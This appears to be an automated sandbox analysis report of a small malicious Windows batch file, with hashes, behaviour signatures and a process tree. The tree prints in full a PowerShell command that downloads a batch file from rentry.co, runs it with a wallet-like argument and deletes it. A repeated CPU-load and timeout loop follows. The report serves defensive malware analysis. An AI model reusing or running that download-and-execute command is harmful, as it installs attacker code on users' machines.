Analysis
-
max time kernel
141s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
01-07-2024 03:24
Static task
static1
Behavioral task
behavioral1
Sample
210622119328062.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
210622119328062.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
210622119328062.bat
Resource
win11-20240508-en
General
-
Target
210622119328062.bat
-
Size
517B
-
MD5
ac9d73455d58bfa42f81e718b8c8d6b5
-
SHA1
60040fff333b7bc09b22e5c013f11b8a99555ed3
-
SHA256
4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
-
SHA512
ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2
Malware Config
Extracted
https://rentry.co/regele/raw
Signatures
-
Delays execution with timeout.exe 64 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 4032 timeout.exe 4336 timeout.exe 4092 timeout.exe 1184 timeout.exe 2552 timeout.exe 1464 timeout.exe 4344 timeout.exe 3064 timeout.exe 4020 timeout.exe 3684 timeout.exe 4456 timeout.exe 1820 timeout.exe 3752 timeout.exe 1600 timeout.exe 4412 timeout.exe 388 timeout.exe 4676 timeout.exe 4872 timeout.exe 3284 timeout.exe 1196 timeout.exe 672 timeout.exe 4320 timeout.exe 3300 timeout.exe 956 timeout.exe 1220 timeout.exe 4060 timeout.exe 4312 timeout.exe 4328 timeout.exe 992 timeout.exe 2800 timeout.exe 4524 timeout.exe 4896 timeout.exe 2228 timeout.exe 3032 timeout.exe 3820 timeout.exe 3752 timeout.exe 2624 timeout.exe 2000 timeout.exe 572 timeout.exe 2400 timeout.exe 4640 timeout.exe 3288 timeout.exe 1648 timeout.exe 4672 timeout.exe 4332 timeout.exe 2292 timeout.exe 3900 timeout.exe 824 timeout.exe 5028 timeout.exe 3296 timeout.exe 1020 timeout.exe 784 timeout.exe 3216 timeout.exe 1088 timeout.exe 1364 timeout.exe 484 timeout.exe 4992 timeout.exe 4820 timeout.exe 1780 timeout.exe 2536 timeout.exe 1828 timeout.exe 2100 timeout.exe 5060 timeout.exe 2304 timeout.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2836 powershell.exe 2836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2836 powershell.exe Token: SeIncreaseQuotaPrivilege 5056 WMIC.exe Token: SeSecurityPrivilege 5056 WMIC.exe Token: SeTakeOwnershipPrivilege 5056 WMIC.exe Token: SeLoadDriverPrivilege 5056 WMIC.exe Token: SeSystemProfilePrivilege 5056 WMIC.exe Token: SeSystemtimePrivilege 5056 WMIC.exe Token: SeProfSingleProcessPrivilege 5056 WMIC.exe Token: SeIncBasePriorityPrivilege 5056 WMIC.exe Token: SeCreatePagefilePrivilege 5056 WMIC.exe Token: SeBackupPrivilege 5056 WMIC.exe Token: SeRestorePrivilege 5056 WMIC.exe Token: SeShutdownPrivilege 5056 WMIC.exe Token: SeDebugPrivilege 5056 WMIC.exe Token: SeSystemEnvironmentPrivilege 5056 WMIC.exe Token: SeRemoteShutdownPrivilege 5056 WMIC.exe Token: SeUndockPrivilege 5056 WMIC.exe Token: SeManageVolumePrivilege 5056 WMIC.exe Token: 33 5056 WMIC.exe Token: 34 5056 WMIC.exe Token: 35 5056 WMIC.exe Token: 36 5056 WMIC.exe Token: SeIncreaseQuotaPrivilege 5056 WMIC.exe Token: SeSecurityPrivilege 5056 WMIC.exe Token: SeTakeOwnershipPrivilege 5056 WMIC.exe Token: SeLoadDriverPrivilege 5056 WMIC.exe Token: SeSystemProfilePrivilege 5056 WMIC.exe Token: SeSystemtimePrivilege 5056 WMIC.exe Token: SeProfSingleProcessPrivilege 5056 WMIC.exe Token: SeIncBasePriorityPrivilege 5056 WMIC.exe Token: SeCreatePagefilePrivilege 5056 WMIC.exe Token: SeBackupPrivilege 5056 WMIC.exe Token: SeRestorePrivilege 5056 WMIC.exe Token: SeShutdownPrivilege 5056 WMIC.exe Token: SeDebugPrivilege 5056 WMIC.exe Token: SeSystemEnvironmentPrivilege 5056 WMIC.exe Token: SeRemoteShutdownPrivilege 5056 WMIC.exe Token: SeUndockPrivilege 5056 WMIC.exe Token: SeManageVolumePrivilege 5056 WMIC.exe Token: 33 5056 WMIC.exe Token: 34 5056 WMIC.exe Token: 35 5056 WMIC.exe Token: 36 5056 WMIC.exe Token: SeIncreaseQuotaPrivilege 3364 WMIC.exe Token: SeSecurityPrivilege 3364 WMIC.exe Token: SeTakeOwnershipPrivilege 3364 WMIC.exe Token: SeLoadDriverPrivilege 3364 WMIC.exe Token: SeSystemProfilePrivilege 3364 WMIC.exe Token: SeSystemtimePrivilege 3364 WMIC.exe Token: SeProfSingleProcessPrivilege 3364 WMIC.exe Token: SeIncBasePriorityPrivilege 3364 WMIC.exe Token: SeCreatePagefilePrivilege 3364 WMIC.exe Token: SeBackupPrivilege 3364 WMIC.exe Token: SeRestorePrivilege 3364 WMIC.exe Token: SeShutdownPrivilege 3364 WMIC.exe Token: SeDebugPrivilege 3364 WMIC.exe Token: SeSystemEnvironmentPrivilege 3364 WMIC.exe Token: SeRemoteShutdownPrivilege 3364 WMIC.exe Token: SeUndockPrivilege 3364 WMIC.exe Token: SeManageVolumePrivilege 3364 WMIC.exe Token: 33 3364 WMIC.exe Token: 34 3364 WMIC.exe Token: 35 3364 WMIC.exe Token: 36 3364 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4852 wrote to memory of 2836 4852 cmd.exe powershell.exe PID 4852 wrote to memory of 2836 4852 cmd.exe powershell.exe PID 4852 wrote to memory of 4524 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 4524 4852 cmd.exe cmd.exe PID 4524 wrote to memory of 5056 4524 cmd.exe WMIC.exe PID 4524 wrote to memory of 5056 4524 cmd.exe WMIC.exe PID 4852 wrote to memory of 4872 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 4872 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 3312 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 3312 4852 cmd.exe cmd.exe PID 3312 wrote to memory of 3364 3312 cmd.exe WMIC.exe PID 3312 wrote to memory of 3364 3312 cmd.exe WMIC.exe PID 4852 wrote to memory of 3284 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 3284 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 4632 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 4632 4852 cmd.exe cmd.exe PID 4632 wrote to memory of 388 4632 cmd.exe WMIC.exe PID 4632 wrote to memory of 388 4632 cmd.exe WMIC.exe PID 4852 wrote to memory of 3900 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 3900 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 2264 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 2264 4852 cmd.exe cmd.exe PID 2264 wrote to memory of 2388 2264 cmd.exe WMIC.exe PID 2264 wrote to memory of 2388 2264 cmd.exe WMIC.exe PID 4852 wrote to memory of 1600 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 1600 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 2940 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 2940 4852 cmd.exe cmd.exe PID 2940 wrote to memory of 2764 2940 cmd.exe WMIC.exe PID 2940 wrote to memory of 2764 2940 cmd.exe WMIC.exe PID 4852 wrote to memory of 1648 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 1648 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 428 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 428 4852 cmd.exe cmd.exe PID 428 wrote to memory of 4456 428 cmd.exe WMIC.exe PID 428 wrote to memory of 4456 428 cmd.exe WMIC.exe PID 4852 wrote to memory of 4992 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 4992 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 348 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 348 4852 cmd.exe cmd.exe PID 348 wrote to memory of 648 348 cmd.exe WMIC.exe PID 348 wrote to memory of 648 348 cmd.exe WMIC.exe PID 4852 wrote to memory of 824 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 824 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 4248 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 4248 4852 cmd.exe cmd.exe PID 4248 wrote to memory of 1488 4248 cmd.exe WMIC.exe PID 4248 wrote to memory of 1488 4248 cmd.exe WMIC.exe PID 4852 wrote to memory of 4896 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 4896 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 3148 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 3148 4852 cmd.exe cmd.exe PID 3148 wrote to memory of 3556 3148 cmd.exe WMIC.exe PID 3148 wrote to memory of 3556 3148 cmd.exe WMIC.exe PID 4852 wrote to memory of 5028 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 5028 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 672 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 672 4852 cmd.exe cmd.exe PID 672 wrote to memory of 1212 672 cmd.exe WMIC.exe PID 672 wrote to memory of 1212 672 cmd.exe WMIC.exe PID 4852 wrote to memory of 2304 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 2304 4852 cmd.exe timeout.exe PID 4852 wrote to memory of 4996 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 4996 4852 cmd.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\210622119328062.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
